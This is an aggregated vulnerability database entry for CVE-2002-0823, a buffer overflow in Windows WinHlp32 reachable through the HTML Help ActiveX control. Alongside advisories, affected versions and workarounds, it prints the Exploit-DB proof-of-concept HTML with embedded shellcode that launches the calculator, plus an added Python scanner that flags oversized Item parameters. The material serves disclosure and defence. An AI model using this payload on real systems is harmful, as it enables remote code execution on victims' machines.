CVE-2002-0823
CVSS 7.5
Published: 2002-08-12 00:00:00
Last revised: 2016-10-17 22:22:11

[Original] Buffer overflow in Winhlp32.exe allows remote attackers to execute arbitrary code via an HTML document that calls the HTML Help ActiveX control (HHCtrl.ocx) with a long pathname in the Item parameter.


[CNNVD] Microsoft Windows HTML Help ActiveX Control Multiple Buffer Overflow Vulnerabilities (CNNVD-200208-234)

        
        The HTML Help ActiveX control (Hhctrl.ocx) ships with Microsoft HTML Help and is designed to provide help functionality together with Internet Explorer.
        The HTML Help ActiveX control contains vulnerabilities that allow remote attackers to mount denial-of-service attacks.
        The HTML Help ActiveX control contains stack- and heap-based buffer overflows. An attacker can build a web page containing malicious data; when a user browses to that link, the result is a denial of service, and carefully crafted data can lead to arbitrary commands being executed on the client system with SYSTEM privileges.
        NGSSoftware will release full technical details after Microsoft provides a patch.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/a:microsoft:windows_help  Microsoft winhlp32
cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0823
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0823
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-234
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=102822806329440&w=2
(UNKNOWN)  BUGTRAQ  20020801 Winhelp32 Remote Buffer Overrun
http://support.microsoft.com/default.aspx?scid=kb;en-us;q293338
(VENDOR_ADVISORY)  MSKB  Q293338
http://www.iss.net/security_center/static/9746.php
(UNKNOWN)  XF  htmlhelp-item-bo(9746)
http://www.securityfocus.com/bid/4857
(UNKNOWN)  BID  4857

- Vulnerability information

Microsoft Windows HTML Help ActiveX Control Multiple Buffer Overflow Vulnerabilities
High  Boundary Condition Error
2002-08-12 00:00:00 2006-04-19 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Rename or delete the HTML Help ActiveX control (Hhctrl.ocx) and disable Active Scripting.
        Vendor patch:
        Microsoft
        ---------
        The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:
        
        http://www.microsoft.com/technet/

- Vulnerability information (21485)

Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability (EDBID:21485)
windows remote
2002-05-27 Verified
0 Next Generation Security
N/A
source: http://www.securityfocus.com/bid/4857/info

HTML Help ActiveX control (Hhctrl.ocx) ships as part of Microsoft HTML Help and is designed to work with Internet Explorer to provide functionality for help systems.

A remotely exploitable issue has been reported in the WinHlp facility. The software fails to perform sufficient boundary checks of the Item parameter in the WinHlp command. This issue resides in Winhlp32.exe.

An attacker can exploit this condition by embedding a call to the vulnerable ActiveX control in a malicious webpage or HTML email. If successful, the attacker may be able to execute arbitrary code on the client system as the Internet Explorer user.

Note that Windows ships with HTML Help.

The HTML Help ActiveX control can also reportedly be used to mount denial-of-service attacks and exploit other stack- and heap-based overflows.

Tiny Personal Firewall 3.0 reportedly treats the HTML Help facility as a trusted application in the default configuration. As a result, any outgoing/back-channel connections that stem from successful exploits will not be blocked by the firewall in the default configuration. Note that this issue is reportedly not present in Tiny Personal Firewall 2.0. 
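A content check a defender could run on inbound HTML or mail, added here as an example and not part of the advisory or of any vendor tool: it parses OBJECT tags whose classid matches the HHCtrl CLSID used in the advisory's proof of concept and flags a WinHelp command whose Item parameter exceeds a length threshold. MAX_ITEM_LEN is an assumed value (the page does not state the real buffer size), and both sample documents are constructed.

```python
# Flag HTML that invokes the HTML Help control (HHCtrl.ocx) with an oversized
# WinHelp Item parameter; usable as a mail-gateway or proxy content check.
from html.parser import HTMLParser

# CLSID of the HTML Help control, as used in the advisory's OBJECT tag.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Assumed threshold: legitimate WinHelp items are short file/topic names, and
# the overflow needs a long string, so anything longer than this is flagged.
MAX_ITEM_LEN = 128

class HHCtrlScanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_hhctrl, self.command, self.items = False, None, []
        self.findings = []  # "<param name>: <length> bytes" per oversized item

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        if tag == "object":
            self.in_hhctrl = HHCTRL_CLSID in a.get("classid", "").lower()
            self.command, self.items = None, []
        elif tag == "param" and self.in_hhctrl:
            name, value = a.get("name", "").lower(), a.get("value", "")
            if name == "command":
                self.command = value.lower()
            elif name.startswith("item"):
                self.items.append((name, value))

    def handle_endtag(self, tag):
        if tag == "object" and self.in_hhctrl:
            if self.command == "winhelp":  # only the WinHelp command path
                self.findings += [f"{n}: {len(v)} bytes" for n, v in self.items
                                  if len(v) > MAX_ITEM_LEN]
            self.in_hhctrl = False

def scan_html(doc: str) -> list:
    """Return a list of oversized Item parameters found in the document."""
    scanner = HHCtrlScanner()
    scanner.feed(doc)
    return scanner.findings

# Constructed samples: a normal help invocation and an oversized Item1.
BENIGN = ('<OBJECT classid=clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11 id=h>'
          '<PARAM NAME="Command" VALUE="WinHelp">'
          '<PARAM NAME="Item1" VALUE="help.hlp"></OBJECT>')
SUSPECT = ('<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 id=w>'
           '<PARAM NAME="Command" VALUE="WinHelp">'
           '<PARAM NAME="Item1" VALUE="' + "A" * 300 + '"></OBJECT>')
```

Renaming or deleting Hhctrl.ocx, as the advisory recommends, remains the host-side mitigation; this scanner only helps spot documents that try to reach the control on the way in.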

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3�Phcalc^Í4$&#402;�&#1;PV¸¯§éw^?Ð3�P¾&#8221;^Ïéw^?�AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH^Ð&#402;�&#21;^?ægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

- Vulnerability information

2991
Microsoft WinHlp Active-X Item Parameter Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Microsoft Windows ships with an HTML Help ActiveX control that allows a remote attacker to execute arbitrary code on a vulnerable system. The flaw is due to insufficient bounds checking of the "Item" parameter in the Winhlp32.exe file. By creating a malicious HTML document that calls the vulnerable ActiveX control, the attacker could execute arbitrary code.

- Timeline

2002-04-02 Unknown
2002-04-02 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Rename or delete the HTML Help ActiveX Control file hhctrl.ocx and disable active scripting.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
Boundary Condition Error 4857
Yes No
2002-05-27 12:00:00 2007-11-01 09:56:00
Vulnerability discovery credited to Next Generation Security Software.

- Affected program versions

Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server


- Exploit

Proof-of-concept code that opens the calculator on the client system is given in the Exploit-DB entry (EDBID:21485) above.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

** IMPORTANT NOTE: The discoverer of this issue has reported that it has been fixed in Microsoft Windows 2000 SP3. Symantec has not been able to identify this specific issue in the list of those addressed by this Service Pack. However, SP3 addresses a number of other issues, so administrators are advised to apply it as soon as possible.

**** There have been reports that this issue is not in fact resolved in Microsoft Windows 2000 SP3.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Datacenter Server SP2

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites